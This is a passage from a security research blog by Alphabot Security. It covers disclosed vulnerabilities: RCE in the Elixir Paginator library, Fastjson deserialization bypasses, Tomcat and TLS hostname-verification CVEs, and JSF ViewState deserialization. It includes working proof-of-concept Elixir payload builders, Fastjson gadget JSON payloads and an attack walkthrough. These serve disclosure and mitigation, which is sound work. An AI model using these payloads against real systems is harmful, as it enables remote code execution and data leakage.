Alphabot Security Blog

News, analysis and insights

RSS Feed

23 Nov 2020 | Peter Stöckli

Remote code execution in Elixir-based Paginator

Intro

In August of this year I found a remote code execution vulnerability in the Elixir-based Paginator open-source project from Duffel (a UK-based startup in the flight searching space). The vulnerability has the CVE number CVE-2020-15150 assigned. Since Duffel seemed to use Paginator for its own REST API it seems likely that an attacker exploiting this vulnerability would have been able to execute code on Duffel’s (cloud) assets.

Vulnerability

This code execution vulnerability existed due to the use of Erlang’s binary_to_term in combination with untrusted user data. This function is much more dangerous when used in Elixir.

The vulnerability could have been triggered via Paginator’s user provided before/after cursors. As seen in Duffel’s Pagination API:

Duffel's Pagination REST API

The string g2wAAAACbQAAABBBZXJvbWlzdC1LaGFya2l2bQAAAB= is a Base64 encoded binary serialized Erlang term (ETF). Such an Erlang term can contain anything from simple string values to full-blown functions containing almost any code you’d like. However, in normal Erlang such a function provided in the payload would not be executed automatically (at least if nobody explicitly calls that function). In Elixir there’s a much higher chance that such a function is executed later down the road, thanks to the Enumerable protocol of Elixir.

Exploits

To demonstrate this vulnerability I created two exploits. The first one starts xcalc:

defp rce_start_xcalc() do
    exploit = fn _, _ ->  System.cmd("xcalc", []); {:cont, []} end
    payload =
    exploit
    |> :erlang.term_to_binary()
    |> Base.url_encode64()
end

The second one prints the stacktrace (so we see where our anonymous function has been triggered):

defp rce_print_stacktrace() do
    exploit = fn _, _ ->  IO.inspect(Process.info(self(), :current_stacktrace), label: "RCE STACKTRACE"); {:cont, []} end
    payload =
    exploit
    |> :erlang.term_to_binary()
    |> Base.url_encode64()
end

The functions above create a Base64 encoded exploit payload (same as the cursors used by Paginator). However, they do not include information about the whereabouts of the cursor, but instead contain an anonymous function that we want the server to execute. (An attacker would execute this functions above on his side, only providing the Base64 encoded payload to an API using Duffel’s Paginator.)

The stacktrace output of the second exploit payload looked like this (when executed from a unit test):

......RCE STACKTRACE: {:current_stacktrace,
[
{Process, :info, 2, [file: 'lib/process.ex', line: 767]},
{PaginatorTest, :"-rce_print_stacktrace/0-fun-0-", 2,
    [file: 'test/paginator_test.exs', line: 945]},
{Stream, :do_zip_next_tuple, 5, [file: 'lib/stream.ex', line: 1191]},
{Stream, :do_zip, 3, [file: 'lib/stream.ex', line: 1168]},
{Enum, :zip, 1, [file: 'lib/enum.ex', line: 2820]},
{Paginator.Ecto.Query, :filter_values, 4,
    [file: 'lib/paginator/ecto/query.ex', line: 43]},
{Paginator.Ecto.Query, :maybe_where, 2,
    [file: 'lib/paginator/ecto/query.ex', line: 103]},
{Paginator.Ecto.Query, :paginate, 2,
    [file: 'lib/paginator/ecto/query.ex', line: 12]},
{Paginator, :entries, 4, [file: 'lib/paginator.ex', line: 325]},
{Paginator, :paginate, 4, [file: 'lib/paginator.ex', line: 180]},
{PaginatorTest,
    :"test paginate a collection of payments, sorting by charged_at sorts ascending with before cursor",
    1, [file: 'test/paginator_test.exs', line: 78]},
{ExUnit.Runner, :exec_test, 1, [file: 'lib/ex_unit/runner.ex', line: 355]},
{:timer, :tc, 1, [file: 'timer.erl', line: 166]},
{ExUnit.Runner, :"-spawn_test_monitor/4-fun-1-", 4,
    [file: 'lib/ex_unit/runner.ex', line: 306]}
]}

This stacktrace reveals that the exploit function was triggered on line 43 of query.ex by the function Enum.zip: our anonymous function is implicitly called by Elixir (thanks to the Enumerable protocol).

Additional information

This is not the first time a vulnerability caused by the use of binary_to_term in combination with untrusted data has been found. Griffin Byatt probably discovered the first publicly known: Code execution through the session cookie in the popular and widely used Elixir Plug.

The Security Working Group of the Erlang Ecosystem Foundation has some recommendations regarding Serialisation and deserialisation including recommendations for mitigations.

Warning
The official Erlang documentation does "warn" about binary_to_term/1, and recommends binary_to_term/2. However, using binary_to_term/2 is not a protection against the code execution shown here (especially not in Elixir). In fact the paginator library used binary_to_term/2 with the safe option. Using binary_to_term/2 with the safe option only protects against certain Denial of Service attacks.

Thanks

Thanks are in order for Duffel (the maintainers of this project):

  • Firstly: Duffel fixed the vulnerability in less than one day and acted very professionally throughout the process.
  • Secondly: Despite not having a bug bounty program, Duffel payed a bounty of 1000 GBP, which I donated in parts to a fund providing help for victims of the explosion in the port of Lebanon.

15 Jul 2020 | Peter Stöckli

Fastjson: exceptional deserialization vulnerabilities

Intro

Many of you may never have heard of the Java based JSON serialization library called Fastjson, although it’s quite an interesting piece of software. Fastjson is an open source project of the Chinese Internet giant Alibaba and has 22’000 stars on GitHub (and coincidentally 1337 open issues) at the time writing of this blog post.

Fastjson on GitHub with 1337 open issues

Like Jackson(-Databind) and other JSON serialization libraries Fastjson comes with a so-called AutoType-feature, which instructs the library to deserialize JSON input using types provided by the JSON (using an extra JSON field called @type). Now we know at least since Muñoz/Mirosh’s Friday-The-13th-JSON-Attacks and Bechler’s marshalsec, that deserializing any input where the types can be provided is potentially insecure and dangerous. And that is especially true if the types can be provided from a remote user (like a JSON object or a ViewState). Now since the Fastjson developers are aware of this, autoType isn’t enabled by default. And even if it is enabled by the developer using this library there is an ever-growing list of types that are not allowed at play.

The Fastjson deny lists

Fastjson maintains deny lists to prevent classes that could potentially lead to RCE from being instantiated (so-called gadgets). To achieve this an array called denyHashCodes is maintained containing the hashes of forbidden packages and class names.

For example, 0xC00BE1DEBAF2808BL is the hash for "jdk.internal.".

The hash function in use (TypeUtils#fnv1a_64) is a 64 bit flavor of the FNV-1a non-cryptographic hash function. The reason for this hash-based deny list seems to be some kind of security by obscurity game.

The unrelated GitHub project called fastjson-blacklist contains a list with many of the hashes and their effective package or class name and a corresponding BreakerUtil.

Fun fact: Arrays.binarySearch is used for checking the denyList for the hash of the type name. That list is only programmatically sorted in some cases. This means that the developers of Fastjson have to be extra careful when adding new entries to the denyList, because they could make parts of the denyList useless. (Hint: binarySearch requires arrays to be sorted to work as intended)

Typical Fastjson RCEs (using the autoType-feature)

Needless to say that new classes that can cause some kind of RCE are discovered all the time, which then leads to the extension of the deny list and the release of a new version of Fastjson (a similar as path Jackson-databind had taken, before they replaced their deny list with an allow list).

An example of such a gadget would be the JDK class javax.swing.JEditorPane, that worked until Fastjson 1.2.68 (released in March of 2020). It can be used for remote detection of older Fastjson versions with autoType enbabled or alternatively to exploit a blind SSRF vulnerability.

A simple payload using that gadget would look like this:

{"@type":"javax.swing.JEditorPane","page": "https://sectests.net/canary/sample"}

If Fastjson before the version 1.2.69 with autoType enabled is in use and the payload above is parsed it instantiates the JDK class javax.swing.JEditorPane and calls its setPage method, which in turn makes a simple HTTP GET request to the URL specified. (As said before this gadget is mostly interesting for the remote detection of a vulnerable application using Fastjson.)

Now it gets interesting…

Most people that know of the dangers of deserialization vulnerabilities won’t be surprised so far. However, while looking at the library I found some interesting things:

The global Fastjson instance

One of these interesting things is that there is a global Fastjson instance, that allows to change its serialization settings. So, it might happen that one developer enables the autoType feature on the global instance for storing some serialized values into a Redis datastore (which in itself is not that dangerous yet):

ParserConfig.getGlobalInstance().setAutoTypeSupport(true);

Whilst another developer parses JSON from a remote data source in another part of the same codebase, with the same global instance. So, a new RCE was created:

JSON.parse(payload);

It looks so harmless, doesn’t it?

How many autoType checks?

In Fastjson 1.2.70 the JSONException with the message "autoType is not support."(sic) is thrown at nine different places in the ParserConfig class. One could argue about the reasons why the authors deem this necessary. In my simplified, naïve view of the world I would expect one place of code where such an exception is thrown (“No really, autoType is not supported, we won’t instantiate your stupid class.). End of discussion. But in this library, there are nine of those autoType checks, enabling people to find all kinds of unintended bypasses.

But can you make an Exception (instance), please?

So, let’s assume we have autoType disabled. Nine different checks should be enough? Right?

Well…

In Mai of 2020 someone discovered that despite autoType being disabled it was possible to instance Exceptions… and leak some data using them. Let’s look at how that was possible:

Just because autoType was not enabled didn’t mean that no classes could be instantiated. It just meant you couldn’t instantiate most classes…

Create Exception - Debugger

So, with a simplified payload like:

{"@type":"java.lang.Exception","@type":"java.lang.RuntimeException"}

it was possible to instantiate a simple RuntimeException, despite autoType being disabled.

When we look at what happens after we call parse on the com.alibaba.fastjson.JSON class we see the following behavior: At one time both our types java.lang.Exception and java.lang.RuntimeException have to go through the checkAutoType in the ParserConfig class, where the over 200(!) lines long checkAutoType method checks following things (excerpt):

  • whether safeMode is enabled (it is not)
  • whether the type name is shorter or equal to 192 chars and at least 3 characters long
  • whether the fnv1a_64-hash of our type name is in the INTERNAL_WHITELIST_HASHCODES array (it is not)
  • whether the fnv1a_64-hash of our type name is in the internalDenyHashCodes array (it is not)
  • Depending on which configuration flags were enabled it would also check against denyHashCodes array

Remember: These steps above happen, despite not having autoType enabled.

Going forward the createException method of the ThrowableDeserializer class tries to instantiate the exception using three different constructors in this order:

if (causeConstructor != null) {
	return (Throwable) causeConstructor.newInstance(message, cause);
}

if (messageConstructor != null) {
	return (Throwable) messageConstructor.newInstance(message);
}

if (defaultConstructor != null) {
	return (Throwable) defaultConstructor.newInstance();
}

At the end with have an instantiated exception on that we can call getters and setters.

The Selenium gadget

Another exception gadget payload, that can be found in the learnjavabug GitHub repository of threedr3am is using the WebDriverException of Selenium. This payload could be used to leak some system information. But not that easily: First of all, it needs a web application that somehow reflects the input data and secondly it requires Selenium on the classpath, which should rarely be the case. (Selenium is mostly used for integration tests and should only be on the classpath that is used for testing.)

A simple version of that payload looks like this (note the $ref):

{"content": {"$ref":"$x.systemInformation"}, "x": {"@type":"java.lang.Exception","@type":"org.openqa.selenium.WebDriverException"}}

If the web application reflects the value of the content property somewhere, system information such as the following could be “leaked”:

host: 'detonation-chamber-20', ip: '127.0.1.1', os.name: 'Linux', os.arch: 'amd64', os.version: '5.4.0-40-generic', java.version: '11.0.7'

Not that interesting information to be honest, but might be interesting if you want to detect if older versions of Fastjson are in use (requires the vulnerable web application to have Selenium on their classpath).

Searching for more gadgets using CodeQL and LGTM

Instead of searching for vulnerabilities using GitHub Security Lab’s amazing CodeQL, I thought it would be interesting to leverage CodeQL on LGTM as a tool to find additional Exception gadgets using a CodeQL query similar to this:

import java

from Class clazz, Method method
where
	clazz.getASourceSupertype*() instanceof TypeException
	and
	method = clazz.getAMethod() and
	method.getName().matches("get%")
	// and ...
select clazz, method

I ran an extended version of this query against some popular Java libraries, but did not find any interesting gadgets (due to the nature of these gadgets this was expected). However, CodeQL in combination with LGTM is definitively a comfortable way of searching for gadget candidates.

Detection with a simple gadget

It turns out that for detection it might be enough to misuse the getStackTrace method implemented on Throwable. In that case any Exception that somehow inherits from Throwable would do (e.g. java.lang.RuntimeException):

{"content": {"$ref":"$x.stackTrace"}, "x": {"@type":"java.lang.Exception","@type":"java.lang.RuntimeException"}}

This detection method also requires that an attribute (like content) is reflected somewhere.

The safe mode

With version 1.2.68 the Fastjson developers introduced the so-called safe mode. One way to turn on safe mode is to call setSafeMode with true on the global config instance:

ParserConfig.getGlobalInstance().setSafeMode(true);

The check for the safe mode flag takes place almost at the top of the already mentioned checkAutoType method in the ParserConfig class and throws an exception when Fastjson wants to instantiate an arbitrary type. However, safe mode is not enabled by default…

Closing thoughts

Basically Fastjson looks like a gift to the information security world that will keep on giving

I didn’t even have the time to look into other interesting features of Fastjson like reference or JSONPath/Regex support, so there’s probably much more interesting stuff in the hiding. Now while Fastjson might seem like an extremely powerful library, it’s probably too powerful for its own good. (Or at least for the developers using it.)

Should you use this library for handling user input? Probably not. Consider using JSON libraries with less features, that prevent you from shooting into your own foot. Like Gson.

06 Jan 2020 | Peter Stöckli

Your Java builds might break starting January 13th (if you haven't yet switched repo access to HTTPS)

Summary

This blog post is a reminder that you should make sure that all your builds in the Java ecosystem access the artifact repositories (e.g. Maven Central) via HTTPS instead of HTTP. This often just means replacing the ‘http:’ in repository URLs with ‘https:’ in your build files (e.g. build.gradle, build.sbt, pom.xml) or your own artifact servers.

Your Java builds might break starting January 13th (no more repo access via HTTP)

It is a long known fact that downloading Java artifacts via HTTP has inherent security risks which might put your company, customers or users at risk. See following posts for more information:

This is why in 2019 Jonathan Leitschuh of Gradle started an initiative to disable HTTP access to artifact servers in a coordinated way. He has posted an update concerning the state of the initiative in January.

On January 13th 2020 HTTP access to JCenter will be disabled, the other repositories like Maven Central will follow on January 15th. This means that you should make sure that your builds only access the artifact repositories via HTTPS or else they might stop working. Hopefully, you switched your builds already a long time ago and don’t need to do anything.

Artifact repositories that will disable HTTP access

This is a non-complete list of artifact repositories, which will disable HTTP access. (Compiled from this Gist.) It contains the links to the individual announcements in case you missed them. It is in many ways better to switch all artifact repository access to HTTPS than to rely on this list.

JCenter (JFrog Bintray)

HTTP disabled on January 13th, 2020
Affected Repo URL(s) http://jcenter.bintray.com
Announcement Secure JCenter with HTTPS

Maven Central

HTTP disabled on January 15th, 2020
Affected Repo URL(s) http://repo1.maven.org, http://repo.maven.apache.org
Announcement HTTP access to repo1.maven.org and repo.maven.apache.org is being deprecated

Spring (Pivotal)

HTTP disabled on January 15th, 2020
Affected Repo URL(s) http://repo.spring.io
Announcement Goodbye http://repo.spring (use https)

Gradle

HTTP disabled on January 15th, 2020
Affected Repo URL(s) http://repo.gradle.org, …
Announcement Decommissioning HTTP for Gradle Services

Conclusion

Switching artifact repositories to HTTPS-only is a good thing for the Java ecosystem, but still not enough… It might be a wake up call for some to think about supply chain security in the world of software. Modern builds in most languages fetch myriads of direct and transitive dependencies, be it for building and testing only or be it for delivering them as part of your product to a customer. Fetching dependencies over HTTPS mitigates potential Man-in-the-middle (MITM) attacks, but it does not solve integrity or authenticity issues:

  • Who assembled the artifacts I’m using?
  • Are updates to the artifacts created by the same developer as previous ones?
  • Are the contents of the fetched artifacts always the same for the same version?

These are issues which can only be solved by verifying the signatures of the artifacts and by checking the cryptographic hashes of the downloaded artifacts. Luckily, the Gradle team is working on these issues

Update (11 Jan 2020)

Added link to initiative update.

03 Dec 2018 | Peter Stöckli

Missing TLS hostname verification in multiple Java libraries

Summary

Alphabot Security has looked at a bunch of popular Java communication libraries to check whether they verify that the hostname of the server they connect to is valid for the presented certificate.

Following Java libraries with missing hostname verification were found:

The Vulnerability

Improper Validation of Certificate with Host Mismatch (CWE-297) is described as follows:

The software communicates with a host that provides a certificate, but the software does not properly ensure that the certificate is actually associated with that host. Even if a certificate is well-formed, signed, and follows the chain of trust, it may simply be a valid certificate for a different site than the site that the software is interacting with.
If the certificate's host-specific data is not properly checked - [..] - it may be possible for a redirection or spoofing attack to allow a malicious host with a valid certificate to provide data, impersonating a trusted host. In order to ensure data integrity, the certificate must be valid and it must pertain to the site that is being accessed.

Unfortunately, this kind of vulnerability is very common in the Java world since certificate verification and hostname verification are treated as two different parts, when in practice some sort of hostname verification is necessary to prevent MITM-attacks on all sorts of different protocols conveyed via TLS. (E.g. see RFC 2818/HTTP Over TLS).

Google provides some good documentation regarding Java and hostname verification with a focus on Android apps, including following warning:

Caution: SSLSocket does not perform hostname verification. It is up to your app to do its own hostname verification, preferably by calling getDefaultHostnameVerifier() with the expected hostname. Further beware that HostnameVerifier.verify() doesn't throw an exception on error but instead returns a boolean result that you must explicitly check.

Since Java 7 there’s another way of setting up hostname verification for libraries that require HTTPS-like hostname verification by calling setEndpointIdentificationAlgorithm with the string-value 'HTTPS' on the SSLParameters of the SSLSocket:

sslParams.setEndpointIdentificationAlgorithm("HTTPS");

Important: If you use SSLContexts in your code always write tests that ensure that hostname verification works as expected.

The suboptimal Java API is often mirrored by libraries that use it, so that the user of the library has to set up hostname verification by himself. In our opinion the sensible thing to do for a library is to be secure by default, whilst allowing the user to turn off security features he deems unnecessary in his specific case.

Spring RabbitMQ Java Client

CVE: CVE-2018-11087

The Spring RabbitMQ Java Client (also known as Spring-AMQP) uses the official RabbitMQ Java Client to connect to RabbitMQ. The official rabbitmq-java-client had some suboptimal API which only allowed to enable hostname verification by providing an own SSLContext. In defense of the library it has JavaDoc on methods like useSslProtocol() that state:

not recommended to use in production as it provides no protection against man-in-the-middle attacks.

However, the Spring RabbitMQ Java Client did not provide an own SSLContext and was as such never protected against MITM-attacks.

The rabbitmq-java-client has since implemented the method enableHostnameVerification(), which makes it easier to enable hostname verification.

The mitigation as described in the advisory:

  • Upgrade to the 1.7.10.RELEASE or 2.0.6.RELEASE and set the enableHostnameValidation property to true. Override the transitive amqp-client version to at least 4.8.0 and 5.4.0, respectively
  • The upcoming 2.1.0.RELEASE will set the property to true by default.
  • If you are using the amqp-client library directly to create a connection factory, refer to its javadocs for the enableHostnameValidation() method.

Apache ActiveMQ Client (CVE-2018-11775)

CVE: CVE-2018-11775

The Apache ActiveMQ Client simply did not have hostname verification. This was fixed in Apache ActiveMQ 5.15.6, enabling hostname verification by default. So if you’re connecting to Amazon MQ or a similar service using the ActiveMQ Client you should upgrade to version 5.15.6 or later.

Jetty WebSocket Client

The Jetty WebSocket client before 9.4.12 had an SslContextFactory configured that was potentially initialized without hostname verification.

The JettyWebSocketClient class of the Spring Framework which uses the Jetty WebSocket client underneath did not configure another SslContextFactory on its own.

Since version 9.4.12 Jetty does provide an SslContextFactory with TLS hostname verification enabled.

Users of the Spring Frameworks that use the JettyWebSocketClient should upgrade to a framework version which includes a Jetty version of 9.4.12 or later.

So if you are using an older version of the Jetty WebSocket client you have to explicitly configure the SslContextFactory to get TLS hostname verification or simply upgrade your Jetty version to 9.4.12 and later.

Final Thoughts

  • While TLS hostname verification is surely not on top of everyone's agenda it's still important that communication libraries perform it by default, because else it can simply undermine the benefits of using TLS and give a false sense of security.
  • There are probably even more libraries in the Java world and in other ecosystems that don't perform TLS hostname verification by default.
  • A shout-out to both the Apache Foundation and Pivotal (the company behind Spring). Both seem to have nice vulnerability management processes at work.

23 Jul 2018 | Peter Stöckli

Apache Tomcat user session mix up and DoS

General

On July the 22nd the Apache Tomcat team released more information about three security vulnerabilities worth mentioning. They have already fixed the vulnerabilities in previous patch releases. Those three vulnerabilities are:

The different vulnerabilities affect the Tomcat 7.0.x, 8.5.x and 9.0.x versions. (Older versions of Tomcat (e.g. 6.0.x and older) are EOL (End of life). The Tomcat 8.0.x line is also EOL.) Please note that there are lots of other products and projects that are based on Tomcat (e.g. TomEE) and might also be affected.

User sessions can get mixed up

CVE: CVE-2018-8037

Affected versions:

  • Tomcat 9.0.0.M9 to 9.0.9
  • Tomcat 8.5.5 to 8.5.31

As it reads in the security announcement:

A bug in the tracking of connection closures can lead to reuse of user sessions
in a new connection.

This was initially reported as “User session are mixed up after internal exceptions” by a JetBrains employee:

We faced an issue when one user became logged in as another one.
I suppose that Tomcat may mix up responses and return session cookie
to the wrong request.

It seems that it may be related to the following errors occured at the same time:

java.lang.NullPointerException
[..]

It seems not yet entirely clear what triggers this potentially grave vulnerability in the NIO and NIO2 connectors. According to the reporter it was accompanied by several exceptions happening in the same time frame.

Denial Of Service (DoS) via UTF-8 decoder

CVE: CVE-2018-1336

Affected versions:

  • Tomcat 9.0.0.M9 to 9.0.7
  • Tomcat 8.5.0 to 8.5.30
  • Tomcat 8.0.0.RC1 to 8.0.51
  • Tomcat 7.0.28 to 7.0.86

As it reads in the security announcement:

An improper handling of overflow in the UTF-8 decoder with supplementary characters
can lead to an infinite loop in the decoder causing a Denial of Service.

Tomcat uses the UTF-8 decoder of the late Apache Harmony project, that decoder has a not supported edge case (aka Bug), which can lead to an infinite loop while trying to decode UTF-8 encoded characters.

No host name verification in WebSocket client

CVE: CVE-2018-8034

Affected versions:

  • Tomcat 9.0.0.M1 to 9.0.9
  • Tomcat 8.5.0 to 8.5.31
  • Tomcat 8.0.0.RC1 to 8.0.52
  • Tomcat 7.0.35 to 7.0.88

Lastly, the WebSocket client did not verify if the hostname in the TLS certificate and the actual hostname of the remote host matched.

Final Thoughts

If you are a user of Apache Tomcat it is recommended to subscribe to the official tomcat-announce mailinglist to get information about new releases and security vulnerabilities directly from the Tomcat team.

We recommend to update your Tomcat installations each time a new Tomcat patch release is announced.

03 Oct 2017 | Peter Stöckli

Apache Tomcat RCE if readonly set to false (CVE-2017-12617)

The Vulnerability

The Apache Tomcat team announced today that all Tomcat versions before 9.0.1 (Beta), 8.5.23, 8.0.47 and 7.0.82 contain a potentially dangerous remote code execution (RCE) vulnerability on all operating systems if the default servlet is configured with the parameter readonly set to false or the WebDAV servlet is enabled with the parameter readonly set to false. This configuration would allow any unauthenticated user to upload files (as used in WebDAV). It was discovered that the filter that prevents the uploading of JavaServer Pages (.jsp) can be circumvented. So JSPs can be uploaded, which then can be executed on the server.

Now since this feature is typically not wanted, most publicly exposed system won’t have readonly set to false.

This security issue (CVE-2017-12617) was discovered after a similar vulnerability in Tomcat 7 on Windows CVE-2017-12615 has been fixed. Unfortunately it has been publicly disclosed in the Tomcat Bugtracker on the 20th of September.

Updating Tomcat to a version where the vulnerability is fixed is recommended in all cases.
(The setting could be enabled by accident or other vulnerable combinations could be discovered.)

Part of the original announcement:

CVE-2017-12617 Apache Tomcat Remote Code Execution via JSP Upload

Severity: Important

Versions Affected:
Apache Tomcat 9.0.0.M1 to 9.0.0
Apache Tomcat 8.5.0 to 8.5.22
Apache Tomcat 8.0.0.RC1 to 8.0.46
Apache Tomcat 7.0.0 to 7.0.81

Description:
When running with HTTP PUTs enabled (e.g. via setting the readonly
initialisation parameter of the Default servlet to false) it was
possible to upload a JSP file to the server via a specially crafted
request. This JSP could then be requested and any code it contained
would be executed by the server.

Mitigation:
Users of the affected versions should apply one of the following
mitigations:
- Upgrade to Apache Tomcat 9.0.1 or later
- Upgrade to Apache Tomcat 8.5.23 or later
- Upgrade to Apache Tomcat 8.0.47 or later
- Upgrade to Apache Tomcat 7.0.82 or later

Credit:
This issue was first reported publicly followed by multiple reports to
the Apache Tomcat Security Team.

History:
2017-10-03 Original advisory

The Exploit

The publicly described exploit is as simple as sending a special crafted HTTP PUT request with a JSP as payload to a Tomcat server.

The code is then executed when the newly uploaded JSP is accessed via an HTTP client (e.g. web browser): uploaded JSP executed on the server

The Misconfiguration

The misconfiguration in the default servlet can be spotted by checking if the web.xml of the default servlet contains an init-param like this (typically there are other init-params set):

    <init-param>
        <param-name>readonly</param-name>
        <param-value>false</param-value>
    </init-param>

Please note: that the misconfiguration could also take place in code or the configuration of the WebDAV servlet (if enabled).

The documentation of the default servlet talks about the read only param like this:

Is this context "read only", so HTTP commands like PUT and DELETE are rejected? [true]

Since this sentence does not mention the dangers of this param we suggested a change of said documentation.

The Mitigation

Updating Tomcat to a version where the vulnerability is fixed (e.g. Tomcat 8.5.23) is recommended.

The readonly init-param shouldn’t be set to false. If this param is left to the default (true) an attacker has not been able to upload files.

On this occasion it’s also a good idea to make sure that you don’t have the same vulnerability in custom PUT implementations (also see: Unrestricted File Upload).

Additionally, it’s of course also possible to block PUT and DELETE requests on the frontend server (e.g. on the Web Application Firewall (WAF)).

Final Thoughts

In our eyes it is almost always wrong to set readonly to false and hopefully most publicly accessible Tomcat servers don’t have it set to false anyways.

If you are a user of Apache Tomcat it is recommended to subscribe to the tomcat-announce mailinglist to get information about new releases and security vulnerabilities directly from the Tomcat team.

Update for developers (04 Oct 2017)

On some sites on the Internet (e.g. on Stack Overflow) you find the information that you should set readonly to false to make your custom servlet accept PUT or DELETE requests. That is simply wrong!

Update (05 Oct 2017)

Updated the blog post to better point out that an upgrade to a fixed Tomcat version is (of course) recommended. Added the original announcement.

Update (09 Oct 2017)

Extended Mitigation chapter, improved wording.


14 Aug 2017 | Peter Stöckli

Misconfigured JSF ViewStates can lead to severe RCE vulnerabilities

tl;dr ViewStates in JSF are serialized Java objects. If the used JSF implementation in a web application is not configured to encrypt the ViewState the web application may have a serious remote code execution (RCE) vulnerability. So it is important that the ViewState encryption is never disabled!

Intro

After we had a look at RCEs through misconfigured JSON libraries we started analyzing the ViewStates of JSF implementations. JavaServer Faces (JSF) is a User Interface (UI) technology for building web UIs with reusable components. JSF is mostly used for enterprise applications and a JSF implementation is typically used by a web application that runs on a Java application server like JBoss EAP or WebLogic Server. There are two well-known implementations of the JSF specification:

  • Oracle Mojarra (JSF reference implementation)
  • Apache MyFaces

Scope

This blog post focuses on the two JSF 2.x implementations: Oracle Mojarra (Reference Implementation) and Apache MyFaces. Older implementations (JSF 1.x) are also likely to be affected by the vulnerabilities described in this post. (JSF 2.0.x was initially released in 2009, the current version is 2.3.x).

The state of the ViewState

A difference between JSF and similar web technologies is that JSF makes use of ViewStates (in addition to sessions) to store the current state of the view (e.g. what parts of the view should currently be displayed). The ViewState can be stored on the server or the client. JSF ViewStates are typically automatically embedded into HTML forms as hidden field with the name javax.faces.ViewState. They are sent back to the server if the form is submitted.

Server-side ViewState

If the JSF ViewState is configured to sit on the server the hidden javax.faces.ViewState field contains an id that helps the server to retrieve the correct state. In the case of MyFaces that id is a serialized Java object!

Client-side ViewState

If the JSF ViewState is configured to sit on the client the hidden javax.faces.ViewState field contains a serialized Java object that is at least Base64 encoded. You might have realized by now that this is a potential road to disaster! That might be one of the reasons why nowadays JSF ViewStates are encrypted and signed before being sent to the client.

The dangers of serialized Java objects

In 2015 at the AppSec California conference Gabriel Lawrence and Chris Frohoff held a presentation with the title Marshalling Pickles (how deserializing objects can ruin your day). This presentation shed some light on forgotten problems with Java object serialization and led to the discovery of several severe remote code execution (RCE) vulnerabilities.

Unfortunately, it led some people to believe that the vulnerability could be mitigated by removing/updating certain versions of Apache Commons Collections. An action which can indeed help but does not solve the root cause of the problem: Deserialization of Untrusted Data (CWE 502). In other words:
The use of a 'vulnerable' Apache Commons Collections version does not mean that the application is vulnerable, neither does the absence of such a library version mean that the application is not vulnerable.

However, after a malicious hacker shut down and encrypted the systems of the San Francisco Municipal Transportation Agency via a "Mad Gadget"/"Apache Commons Collections Deserialization Vulnerability" Google started Operation Rosehub. The aim of operation Rosehub was to find as many Java open source projects as possible which used an 'attacker-friendly' commons collections version as dependency and submit pull requests to the project owners so that those projects would stop using problematic commons collections versions in newer releases.

The attack on the ViewState

Let’s assume we have a web application with a JSF based login page:

JSF based login

That login page has a ViewState that is neither encrypted nor signed. So when we look at its HTML source we see a hidden field containing the ViewState:

Unencrypted MyFaces ViewState:
<input type="hidden" name="javax.faces.ViewState" id="j_id__v_0:javax.faces.ViewState:1" value="rO0ABXVyABNbTGphdmEubGFuZy5PYmplY3Q7kM5YnxBzKWwCAAB4cAAAAAJwdAAML2xvZ2luLnhodG1s" autocomplete="off" />


If you decode the above ViewState using Base64 you will notice that it contains a serialized Java object. This ViewState is sent back to the server via POST when the form is submitted (e.g. click on Login). Now before the ViewState is POSTed back to the server the attacker replaces the ViewState with his own malicious ViewState using a gadget that’s already on the server’s classpath (e.g. InvokerTransformer from commons-collections-3.2.1.jar) or even a gadget that is not yet known to the public. With said malicious gadget placed in the ViewState the attacker specifies which commands he wants to run on the server. The flexibility of what an attacker can do is limited by the powers of the available gadgets on the classpath of the server. In case of the InvokerTransformer the attacker can specify which command line commands should be executed on the server. The attacker in our example chose to start a calculator on the UI of our Linux based server.

After the attacker has sent his modified form back to the server the JSF implementation tries to deserialize the provided ViewState. Now even before the deserialization of the ViewState has ended the command is executed and the calculator is started on the server:

calculator started via a JSF ViewState

Everything happened before the JSF implementation could have a look at the ViewState and decide that it was no good. When the ViewState was found to be invalid typically an error is sent back to the client like “View expired”. But then it’s already too late. The attacker had access to the server and has run commands. (Most real-world attackers don’t start a calculator but they typically deploy a remote shell, which they then use to access the server.)

=> All in all this example demonstrates a very dangerous unauthenticated remote code execution (RCE) vulnerability.

(Almost the same attack scenario against JSF as depicted above was already outlined and demonstrated in the 2015 presentation (pages 65 to 67): Marshalling Pickles held by Frohoff and Lawrence.)

The preconditions for a successful attack

Now, what are the ingredients for a disaster?

  • unencrypted ViewState
  • Gadget on the classpath of the server
  • In case of Mojarra: ViewState configured to reside on the client
  • In case of MyFaces: ViewState configured to reside on the client or the server

Let’s have a look at those points in relation to the two JSF implementations.

Oracle Mojarra (JSF reference implementation)

As said before Oracle Mojarra is the JSF Reference Implementation (RI) but might not be known under that name. It might be known as Sun JSF RI, recognized with the java package name com.sun.faces or with the ambiguous jar name jsf-impl.jar.

Mojarra: unencrypted ViewState

So here’s the thing: Mojarra did not encrypt and sign the client-side ViewState by default in most of the versions of 2.0.x and 2.1.x. It is important to note that a server-side ViewState is the default in both JSF implementations but a developer could easily switch the configuration to use a client-side viewstate by setting the javax.faces.STATE_SAVING_METHOD param to client. The param name does in no way give away that changing it to client introduces grave remote code execution vulnerabilities (e.g. a client-side viewstate might be used in clustered web applications).

Whilst client-side ViewState encryption is the default in Mojarra 2.2 and later versions it was not for the 2.0.x and 2.1.x branches. However, in May 2016 the Mojarra developers started backporting default client-side ViewState encryption to 2.0.x and 2.1.x when they realized that unencrypted ViewStates lead to RCE vulnerabilities.

So at least version 2.1.29-08 (released in July 2016) from the 2.1.x Branch and version 2.0.11-04 (also released in July 2016) from the 2.0.x have encryption enabled by default.

When we analyzed the Mojarra libraries we noticed that Red Hat also releases Mojarra versions for the 2.1.x and 2.0.x branches, the latest being 2.1.29-jbossorg-1 and 2.0.4-b09-jbossorg-4. Since both releases were without default ViewState encryption we contacted Red Hat and they promptly created Bug 1479661 - JSF client side view state saving deserializes data in their bugtracker with following mitigation advice for the 2.1.x branch:

A vulnerable web application needs to have set javax.faces.STATE_SAVING_METHOD to 'client' to enable client-side view state saving. The default value on Enterprise Application Platform (EAP) 6.4.x is 'server'.

If javax.faces.STATE_SAVING_METHOD is set to 'client' a mitigation for this issue is to encrypt the view by setting com.sun.faces.ClientStateSavingPassword in the application web.xml:
  <context-param>
    <param-name>javax.faces.STATE_SAVING_METHOD</param-name>
    <param-value>client</param-value>
  </context-param>

  <env­-entry> 
    <env­-entry-­name>com.sun.faces.ClientStateSavingPassword</env­-entry-­name> 
    <env-­entry-­type>java.lang.String</env-­entry-­type> 
    <env-­entry-­value>[some secret password]</env-­entry-value>
  </env­-entry>

